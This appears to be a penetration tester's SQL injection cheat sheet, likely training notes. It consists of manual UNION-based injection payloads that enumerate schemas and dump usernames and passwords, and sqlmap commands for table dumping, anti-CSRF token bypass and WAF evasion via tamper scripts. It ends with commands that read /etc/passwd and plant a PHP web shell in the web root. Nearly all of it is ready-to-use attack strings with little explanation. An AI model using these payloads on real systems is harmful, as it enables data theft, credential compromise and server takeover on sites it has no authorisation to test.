SQL Injection

Union Injection
Database Enumeration
SQLMap

Union Injection

' order by 2-- -
' order by 3-- -

' UNION select 1,2,3-- -
' UNION select 1,2,3,4-- -

Database Enumeration

' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- -

Current database

' UNION select 1,database(),2,3-- -

Tables

' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- -

When you only see one, use: GROUP_CONCAT(table_name)

Columns

' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- -

When you only see one, use: GROUP_CONCAT(column_name)

Data

' UNION select 1, username, password, 4 from dev.credentials-- -

SQLMap

Prefix/Suffix

sqlmap -u "www.example.com/?q=test" --prefix="%'))" --suffix="-- -"

Basic DB Data Enumeration

Database version banner (switch --banner)
Current user name (switch --current-user)
Current database name (switch --current-db)
Checking if the current user has DBA (administrator) rights (switch --is-dba)

Limit Output

sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --start=2 --stop=3

Conditional Enumeration

sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --where="name LIKE 'f%'"

Searching for Data

Search for all table names containing the keyword user

sqlmap -u "http://www.example.com/?id=1" --search -T user

search for all column names containing the keyword pass

sqlmap -u "http://www.example.com/?id=1" --search -C pass

Anti-CSRF Token Bypass

sqlmap -u "http://www.example.com/" --data="id=1&csrf-token=WfF1szMUHhiokx9AHFply5L2xAOfjRkE" --csrf-token="csrf-token"

Unique Value Bypass

sqlmap -u "http://www.example.com/?id=1&rp=29125" --randomize=rp

Tamper Scripts

sqlmap -u "http://example.com/vulnerable.php?id=1" --tamper=space2comment,charencode

Tamper-Script	Description
0eunion	Replaces instances of `UNION` with `e0UNION`
base64encode	Base64-encodes all characters in a given payload
between	Replaces greater than operator (`>`) with `NOT BETWEEN 0 AND #` and equals operator (`=`) with `BETWEEN # AND #`
commalesslimit	Replaces (MySQL) instances like `LIMIT M, N` with `LIMIT N OFFSET M`
equaltolike	Replaces all occurrences of operator equal (`=`) with `LIKE` counterpart
halfversionedmorekeywords	Adds (MySQL) versioned comment before each keyword
modsecurityversioned	Embraces complete query with (MySQL) versioned comment
modsecurityzeroversioned	Embraces complete query with (MySQL) zero-versioned comment
percentage	Adds a percentage sign (`%`) in front of each character (e.g. `SELECT` → `%S%E%L%E%C%T`)
plus2concat	Replaces plus operator (`+`) with (MsSQL) function `CONCAT()` counterpart
randomcase	Replaces each keyword character with random case value (e.g. `SELECT` → `SEleCt`)
space2comment	Replaces space character () with comments `/`
space2dash	Replaces space character () with a dash comment (`--`) followed by a random string and a newline (`\n`)
space2hash	Replaces (MySQL) space character () with `#` followed by a random string and a newline (`\n`)
space2mssqlblank	Replaces (MsSQL) space character () with a random blank character from a valid alternate set
space2plus	Replaces space character () with `+`
space2randomblank	Replaces space character () with a random blank character from a valid alternate set
symboliclogical	Replaces `AND` and `OR` with symbolic counterparts `&&` and `\\|\\|`
versionedkeywords	Encloses each non-function keyword with (MySQL) versioned comment
versionedmorekeywords	Encloses each keyword with (MySQL) versioned comment

Reading Local Files

sqlmap -u "http://www.example.com/?id=1" --file-read "/etc/passwd"

Writing Local Files

sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php"